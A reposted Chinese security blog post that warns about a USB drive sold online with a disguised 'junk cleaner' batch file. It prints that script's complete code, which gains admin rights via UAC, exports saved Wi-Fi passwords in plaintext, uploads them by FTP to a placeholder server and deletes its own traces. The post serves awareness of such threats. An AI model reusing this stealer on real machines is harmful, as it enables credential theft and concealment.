登录账号
首页 安全文摘 正文

来买个小内存u盘么咯?盘内带电脑垃圾清理.bat那种

桑云信息安云 安全文摘 2019-08-08 536230
在某宝个别店铺购买了小内存u盘到货后插入电脑,发现自带了一个名为电脑垃圾清理的小程序。对就是这货怀揣着这家店真好,还带了垃圾清理软件的想法,我试着运行了软件.但是好像没有卵用.正好小表弟好像对这个比较了解,我去问问他咋回事儿小表弟下班回家后给我发了这么一段消息嗯…这是个bat脚本,他会打包本机的一些数据到一个文件夹里并全部发送到服务器上,然后删除痕迹和自身防
用户会话分析-免费网站统计即安即用,实时统计网站流量数据 - 桑云

在某宝个别店铺购买了小内存u盘到货后插入电脑,发现自带了一个名为电脑垃圾清理的小程序。

来买个小内存u盘么咯?盘内带电脑垃圾清理.bat那种 社会工程学 信息窃取 安全文摘 第1张


对就是这货

怀揣着这家店真好,还带了垃圾清理软件的想法,我试着运行了软件.

但是好像没有卵用.

正好小表弟好像对这个比较了解,我去问问他咋回事儿

小表弟下班回家后给我发了这么一段消息

来买个小内存u盘么咯?盘内带电脑垃圾清理.bat那种 社会工程学 信息窃取 安全文摘 第2张


嗯…

这是个bat脚本,他会打包本机的一些数据到一个文件夹里并全部发送到服务器上,然后删除痕迹和自身防止服务器信息泄露

本文以WIFI信息获取并发送至服务器为例子

来买个小内存u盘么咯?盘内带电脑垃圾清理.bat那种 社会工程学 信息窃取 安全文摘 第3张


这个是代码

@echo off
>nul 2>&1 “%SYSTEMROOT%\system32\cacls.exe” “%SYSTEMROOT%\system32\config\system”
if ‘%errorlevel%’ NEQ ‘0’ (
goto UACPrompt
) else ( goto gotAdmin )
:UACPrompt
echo Set UAC = CreateObject^(“Shell.Application”^) > “%temp%\getadmin.vbs”
echo UAC.ShellExecute “%~s0”, “”, “”, “runas”, 1 >> “%temp%\getadmin.vbs”
“%temp%\getadmin.vbs”
exit /B
:gotAdmin
if exist “%temp%\getadmin.vbs” ( del “%temp%\getadmin.vbs” )
md c:\win
netsh wlan export profile key=clear folder=c:\win
echo open 服务器IP>C:\config.txt
echo user FTP账号>>C:\config.txt
echo FTP密码>>C:\config.txt
echo mput c:\win\*.xml>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo ye

s>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo yes>>C:\config.txt

echo bye>>C:\config.txt

ftp -n -s:”C:\config.txt”

del C:\config.txt

del C:\win\*.xml

del %0

运行bat文件后,他会将电脑所连接过的WIFI信息发送至FTP目录

如图

来买个小内存u盘么咯?盘内带电脑垃圾清理.bat那种 社会工程学 信息窃取 安全文摘 第4张


随便打开其中一个就有了该WIFI相关信息

而假如bat批处理文件是一些远程下载运行的指令呢.

你猜猜后果是啥

原文由http://www.qisafe.net/?p=261

海报

本文转载自互联网,如有侵权,联系删除

转载请注明本文地址:https://heibai.org.cn/1500.html

相关推荐

发布评论

ainiaobaibaibaibaobaobeishangbishibizuichiguachijingchongjingdahaqiandaliandangaodw_dogedw_erhadw_miaodw_tuzidw_xiongmaodw_zhutouganbeigeiliguiguolaiguzhanghahahahashoushihaixiuhanheixianhenghorse2huaixiaohuatonghuaxinhufenjiayoujiyankeaikeliankouzhaokukuloukunkuxiaolandelinileimuliwulxhainiolxhlikelxhqiuguanzhulxhtouxiaolxhwahahalxhzanningwennonuokpinganqianqiaoqinqinquantouruoshayanshengbingshiwangshuaishuijiaosikaostar0star2star3taikaixintanshoutianpingtouxiaotuwabiweifengweiquweiwuweixiaowenhaowoshouwuxiangjixianhuaxiaoerbuyuxiaokuxiaoxinxinxinxinsuixixixuyeyinxianyinyueyouhenghengyuebingyueliangyunzanzhajizhongguozanzhoumazhuakuangzuohenghengzuoyi

安全快讯

扫码关注

  • 微信公众号

    微信公众号

  • 微信小程序

    微信小程序

Powered By Z-BlogPHPTheme By优美主题
Copyright © 2021 HEIBAI.ORG.CN All Rights Reserved.网站ICP备案蜀ICP备2021014542号 | 公安网备案川公网安备 51118102000215号
感谢您的支持